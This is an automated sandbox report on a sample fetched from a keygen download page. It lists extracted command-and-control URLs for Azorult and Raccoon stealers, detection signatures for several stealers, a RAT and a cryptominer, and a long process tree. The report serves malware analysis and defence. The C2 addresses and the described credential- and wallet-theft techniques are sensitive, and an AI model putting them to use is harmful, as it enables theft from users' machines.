Resubmissions

18-04-2021 09:11

210418-l2b52pc3js 10

Analysis

  • max time kernel
    584s
  • max time network
    437s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    18-04-2021 09:11

General

  • Target

    https://keygenit.com/d/59def7ae481psn8p58q.html

  • Sample

    210418-l2b52pc3js

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 52 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/59def7ae481psn8p58q.html
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc17f64f50,0x7ffc17f64f60,0x7ffc17f64f70
      2⤵
        PID:4024
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1784 /prefetch:2
        2⤵
          PID:2292
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1832 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2520
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
          2⤵
            PID:2612
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:1
            2⤵
              PID:3852
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2396 /prefetch:8
              2⤵
                PID:2688
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:1
                2⤵
                  PID:2100
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1624 /prefetch:1
                  2⤵
                    PID:908
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                    2⤵
                      PID:3856
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                      2⤵
                        PID:4156
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
                        2⤵
                          PID:4236
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
                          2⤵
                            PID:4720
                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                            2⤵
                              PID:4864
                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a7dfa890,0x7ff6a7dfa8a0,0x7ff6a7dfa8b0
                                3⤵
                                  PID:4892
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4948
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6452 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5044
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4172
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5908 /prefetch:8
                                2⤵
                                  PID:4324
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:8
                                  2⤵
                                    PID:3832
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5932 /prefetch:8
                                    2⤵
                                      PID:4576
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:8
                                      2⤵
                                        PID:1364
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5892 /prefetch:8
                                        2⤵
                                          PID:372
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4480 /prefetch:8
                                          2⤵
                                            PID:4832
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3272 /prefetch:8
                                            2⤵
                                              PID:4748
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6412 /prefetch:8
                                              2⤵
                                                PID:1368
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
                                                2⤵
                                                  PID:4872
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:8
                                                  2⤵
                                                    PID:4900
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:8
                                                    2⤵
                                                      PID:4884
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:8
                                                      2⤵
                                                        PID:4896
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:8
                                                        2⤵
                                                          PID:5088
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6276 /prefetch:8
                                                          2⤵
                                                            PID:4856
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6188 /prefetch:8
                                                            2⤵
                                                              PID:4164
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6212 /prefetch:8
                                                              2⤵
                                                                PID:4788
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5488 /prefetch:8
                                                                2⤵
                                                                  PID:4408
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:8
                                                                  2⤵
                                                                    PID:4392
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6428 /prefetch:8
                                                                    2⤵
                                                                      PID:4280
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6768 /prefetch:8
                                                                      2⤵
                                                                        PID:4580
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6320 /prefetch:8
                                                                        2⤵
                                                                          PID:4604
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6332 /prefetch:8
                                                                          2⤵
                                                                            PID:1364
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5912 /prefetch:8
                                                                            2⤵
                                                                              PID:4276
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7148 /prefetch:8
                                                                              2⤵
                                                                                PID:4328
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7260 /prefetch:8
                                                                                2⤵
                                                                                  PID:4396
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7284 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4224
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7296 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4476
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7308 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4760
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7332 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4496
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7320 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4432
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4848
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6120 /prefetch:8
                                                                                              2⤵
                                                                                                PID:5024
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8096 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4876
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7196 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4864
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4032
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4596
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7784 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4776
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:4892
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5036
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:812
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6820 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5764
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11330535737966494150,2534330152978992720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7460 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4740
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                              1⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2592
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                              1⤵
                                                                                                                PID:2568
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                1⤵
                                                                                                                  PID:2488
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                  1⤵
                                                                                                                    PID:2340
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                    1⤵
                                                                                                                      PID:2304
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:1868
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                      1⤵
                                                                                                                        PID:1436
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                        1⤵
                                                                                                                          PID:1348
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                          1⤵
                                                                                                                            PID:1256
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                            1⤵
                                                                                                                              PID:1088
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                              1⤵
                                                                                                                                PID:948
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                1⤵
                                                                                                                                  PID:1008
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4084
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:4400
                                                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:4820
